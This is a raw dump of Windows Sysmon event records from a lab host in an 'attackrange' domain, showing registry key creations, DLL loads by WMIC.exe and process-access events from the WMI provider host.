12241200x800000000000000057348778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348776Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348775Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 12241200x800000000000000057348774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348773Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348772Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348771Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057348770Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\jscript.dll5.812.10240.16384Microsoft ® JScriptMicrosoft ® JScriptMicrosoft Corporationjscript.dllMD5=017AA3E55F15439E32C6F461E5686CCD,SHA256=8117D34017F6F90BC9DC68E3F79346E62E389AFE9E154FF0FCB99FB921845486trueMicrosoft WindowsValid 12241200x800000000000000057348769Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 734700x800000000000000057348762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 12241200x800000000000000057348761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057348756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057348755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.873{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValid 12241200x800000000000000057348754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057348753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057348752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057348751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057348749Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348748Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 734700x800000000000000057348744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.858{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\wbem\WMIC.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValid 12241200x800000000000000057348743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348741Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348740Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348739Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348738Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348737Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348736Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348735Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057348734Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057348733Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057348732Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348731Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.873{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057348730Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.858{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 11241100x800000000000000057348729Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.858{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057348728Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.858{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE541D7D690CAD890047B1F815B1F13F,SHA256=B5018C5B300CFC6C1C9C6949C5337D74405D0A442DB9D7049292B9E2DEB23DAFfalsetrue 12241200x800000000000000057348727Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:51.858{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 10341000x800000000000000057348726Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-5BAB-618E-59F3-04000000F101}4656C:\Windows\System32\Wbem\WMIC.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348725Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-5BAB-618E-58F3-04000000F101}9304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348724Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8B2D-618D-C4DA-04000000F101}8884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348723Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8B2C-618D-C2DA-04000000F101}6044C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348722Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-8B2B-618D-C0DA-04000000F101}8736C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348721Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-4DA8-618D-73D3-04000000F101}4464C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348720Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-2718-618C-BDB0-04000000F101}3812C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348719Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:51.820{8B6011A9-5BAB-618E-5AF3-04000000F101}63208276C:\Windows\system32\wbem\wmiprvse.exe{8B6011A9-2718-618C-BCB0-04000000F101}2320C:\windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c599|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x800000000000000057348718Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 